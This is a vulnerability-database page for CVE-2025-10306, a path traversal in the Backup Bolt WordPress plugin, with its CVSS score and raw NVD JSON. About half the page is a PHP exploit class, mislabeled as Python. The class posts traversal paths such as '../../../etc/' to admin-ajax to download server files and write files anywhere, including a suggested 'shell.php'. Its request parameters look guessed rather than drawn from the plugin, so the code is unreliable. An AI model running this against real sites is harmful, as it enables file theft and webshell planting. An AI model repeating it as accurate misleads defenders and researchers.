Security Vulnerability Report
中文
CVE-2025-10306 CVSS 3.8 LOW

CVE-2025-10306

Published: 2025-10-03 12:15:42
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Backup Bolt plugin for WordPress is vulnerable to arbitrary file downloads and backup location writes in all versions up to, and including, 1.4.1 via the process_backup_batch() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to download directories outside of the webroot and write backup zip files to arbitrary locations.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Backup Bolt 插件 <= 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-10306 - Backup Bolt Arbitrary File Download/Write PoC * Vulnerability: Path traversal in process_backup_batch() function * Affected: Backup Bolt plugin <= 1.4.1 * Required: Administrator-level WordPress access */ // PoC exploit code for CVE-2025-10306 // This demonstrates how an authenticated administrator could exploit // the path traversal vulnerability in process_backup_batch() class BackupBoltExploit { private $target_url; private $admin_cookies; private $nonce; public function __construct($target_url, $admin_cookies, $nonce) { $this->target_url = $target_url; $this->admin_cookies = $admin_cookies; $this->nonce = $nonce; } /** * Exploit arbitrary file download via path traversal * Download files outside webroot (e.g., /etc/passwd, wp-config.php backup) */ public function exploit_arbitrary_download($malicious_path) { // Construct payload with path traversal to escape webroot $payload = array( 'action' => 'backup_bolt_process_batch', 'backup_path' => $malicious_path, // e.g., '../../../etc/' 'batch_size' => 100, '_wpnonce' => $this->nonce ); $ch = curl_init($this->target_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Cookie: ' . $this->admin_cookies, 'X-Requested-With: XMLHttpRequest' )); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); return $response; } /** * Exploit arbitrary file write via path traversal * Write backup zip to arbitrary location on the server */ public function exploit_arbitrary_write($destination_path, $backup_data) { $payload = array( 'action' => 'backup_bolt_process_batch', 'output_path' => $destination_path, // e.g., '/var/www/html/wp-content/uploads/shell.php' 'backup_data' => base64_encode($backup_data), '_wpnonce' => $this->nonce ); $ch = curl_init($this->target_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Cookie: ' . $this->admin_cookies, 'X-Requested-With: XMLHttpRequest' )); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); return $response; } } // Example usage: // $exploit = new BackupBoltExploit('http://target-wordpress-site.com', 'wordpress_logged_in=xxx', 'nonce_value'); // $exploit->exploit_arbitrary_download('../../../etc/'); // $exploit->exploit_arbitrary_write('/var/www/html/wp-content/uploads/malicious.zip', 'backup content'); ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10306", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:42.457", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Backup Bolt plugin for WordPress is vulnerable to arbitrary file downloads and backup location writes in all versions up to, and including, 1.4.1 via the process_backup_batch() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to download directories outside of the webroot and write backup zip files to arbitrary locations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3373151%40backup-bolt&new=3373151%40backup-bolt&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/backup-bolt/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/63f38644-a021-407a-9882-2c8435849c08?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.